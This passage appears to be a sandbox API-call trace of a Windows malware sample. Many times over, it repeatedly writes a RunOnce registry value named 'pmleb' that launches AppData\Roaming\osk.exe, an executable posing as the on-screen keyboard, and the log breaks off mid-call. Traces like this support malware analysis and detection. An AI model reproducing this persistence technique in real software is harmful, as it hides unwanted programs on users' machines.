ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.521] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.521] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.521] RegCloseKey (hKey=0x280) returned 0x0 [0108.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.522] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.522] SetTimer (hWnd=0x20280, nIDEvent=0x242c, uElapse=0xa, lpTimerFunc=0x0) returned 0x242c [0108.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.536] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.536] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.536] KillTimer (hWnd=0x20280, uIDEvent=0x242c) returned 1 [0108.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.536] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.537] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.537] RegCloseKey (hKey=0x280) returned 0x0 [0108.537] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.537] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.537] SetTimer (hWnd=0x20280, nIDEvent=0x242d, uElapse=0xa, lpTimerFunc=0x0) returned 0x242d [0108.537] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.551] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.551] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.551] KillTimer (hWnd=0x20280, uIDEvent=0x242d) returned 1 [0108.552] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.552] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.552] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.552] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.553] RegCloseKey (hKey=0x280) returned 0x0 [0108.553] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.553] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.553] SetTimer (hWnd=0x20280, nIDEvent=0x242e, uElapse=0xa, lpTimerFunc=0x0) returned 0x242e [0108.553] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.567] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.567] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.567] KillTimer (hWnd=0x20280, uIDEvent=0x242e) returned 1 [0108.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.568] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.568] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.568] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.568] RegCloseKey (hKey=0x280) returned 0x0 [0108.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.568] SetTimer (hWnd=0x20280, nIDEvent=0x242f, uElapse=0xa, lpTimerFunc=0x0) returned 0x242f [0108.569] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.583] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.583] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.583] KillTimer (hWnd=0x20280, uIDEvent=0x242f) returned 1 [0108.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.583] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.584] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.584] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.584] RegCloseKey (hKey=0x280) returned 0x0 [0108.584] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.584] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.584] SetTimer (hWnd=0x20280, nIDEvent=0x2430, uElapse=0xa, lpTimerFunc=0x0) returned 0x2430 [0108.584] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.617] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.617] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.617] KillTimer (hWnd=0x20280, uIDEvent=0x2430) returned 1 [0108.617] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.617] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.618] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.618] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.618] RegCloseKey (hKey=0x280) returned 0x0 [0108.618] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.618] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.618] SetTimer (hWnd=0x20280, nIDEvent=0x2431, uElapse=0xa, lpTimerFunc=0x0) returned 0x2431 [0108.618] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.629] KillTimer (hWnd=0x20280, uIDEvent=0x2431) returned 1 [0108.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.630] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.630] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.630] RegCloseKey (hKey=0x280) returned 0x0 [0108.631] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.631] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.631] SetTimer (hWnd=0x20280, nIDEvent=0x2432, uElapse=0xa, lpTimerFunc=0x0) returned 0x2432 [0108.631] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.645] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.645] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.645] KillTimer (hWnd=0x20280, uIDEvent=0x2432) returned 1 [0108.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.646] RegCloseKey (hKey=0x280) returned 0x0 [0108.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.646] SetTimer (hWnd=0x20280, nIDEvent=0x2433, uElapse=0xa, lpTimerFunc=0x0) returned 0x2433 [0108.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.660] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.660] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.660] KillTimer (hWnd=0x20280, uIDEvent=0x2433) returned 1 [0108.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.661] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.661] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.661] RegCloseKey (hKey=0x280) returned 0x0 [0108.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.661] SetTimer (hWnd=0x20280, nIDEvent=0x2434, uElapse=0xa, lpTimerFunc=0x0) returned 0x2434 [0108.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.677] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.677] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.677] KillTimer (hWnd=0x20280, uIDEvent=0x2434) returned 1 [0108.677] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.677] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.677] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.678] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.678] RegCloseKey (hKey=0x280) returned 0x0 [0108.678] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.678] SetTimer (hWnd=0x20280, nIDEvent=0x2435, uElapse=0xa, lpTimerFunc=0x0) returned 0x2435 [0108.678] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.692] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.692] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.692] KillTimer (hWnd=0x20280, uIDEvent=0x2435) returned 1 [0108.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.692] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.693] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.693] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.693] RegCloseKey (hKey=0x280) returned 0x0 [0108.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.693] SetTimer (hWnd=0x20280, nIDEvent=0x2436, uElapse=0xa, lpTimerFunc=0x0) returned 0x2436 [0108.693] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.707] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.707] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.707] KillTimer (hWnd=0x20280, uIDEvent=0x2436) returned 1 [0108.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.708] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.708] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.708] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.708] RegCloseKey (hKey=0x280) returned 0x0 [0108.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.708] SetTimer (hWnd=0x20280, nIDEvent=0x2437, uElapse=0xa, lpTimerFunc=0x0) returned 0x2437 [0108.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.723] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.723] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.723] KillTimer (hWnd=0x20280, uIDEvent=0x2437) returned 1 [0108.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.724] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.724] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.724] RegCloseKey (hKey=0x280) returned 0x0 [0108.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.725] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.725] SetTimer (hWnd=0x20280, nIDEvent=0x2438, uElapse=0xa, lpTimerFunc=0x0) returned 0x2438 [0108.725] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.741] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.741] KillTimer (hWnd=0x20280, uIDEvent=0x2438) returned 1 [0108.742] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.742] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.742] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.742] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.743] RegCloseKey (hKey=0x280) returned 0x0 [0108.743] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.743] SetTimer (hWnd=0x20280, nIDEvent=0x2439, uElapse=0xa, lpTimerFunc=0x0) returned 0x2439 [0108.743] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.754] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.754] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.754] KillTimer (hWnd=0x20280, uIDEvent=0x2439) returned 1 [0108.754] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.755] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.755] RegCloseKey (hKey=0x280) returned 0x0 [0108.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.755] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.755] SetTimer (hWnd=0x20280, nIDEvent=0x243a, uElapse=0xa, lpTimerFunc=0x0) returned 0x243a [0108.755] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.769] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.769] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.769] KillTimer (hWnd=0x20280, uIDEvent=0x243a) returned 1 [0108.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.770] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.770] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.771] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.771] RegCloseKey (hKey=0x280) returned 0x0 [0108.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.771] SetTimer (hWnd=0x20280, nIDEvent=0x243b, uElapse=0xa, lpTimerFunc=0x0) returned 0x243b [0108.771] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.785] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.785] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.785] KillTimer (hWnd=0x20280, uIDEvent=0x243b) returned 1 [0108.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.786] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.786] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.787] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.787] RegCloseKey (hKey=0x280) returned 0x0 [0108.787] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.787] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.787] SetTimer (hWnd=0x20280, nIDEvent=0x243c, uElapse=0xa, lpTimerFunc=0x0) returned 0x243c [0108.787] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.800] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.800] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.801] KillTimer (hWnd=0x20280, uIDEvent=0x243c) returned 1 [0108.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.802] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.802] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.802] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.802] RegCloseKey (hKey=0x280) returned 0x0 [0108.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.802] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.802] SetTimer (hWnd=0x20280, nIDEvent=0x243d, uElapse=0xa, lpTimerFunc=0x0) returned 0x243d [0108.803] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.816] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.816] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.816] KillTimer (hWnd=0x20280, uIDEvent=0x243d) returned 1 [0108.817] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.817] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.817] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.818] RegCloseKey 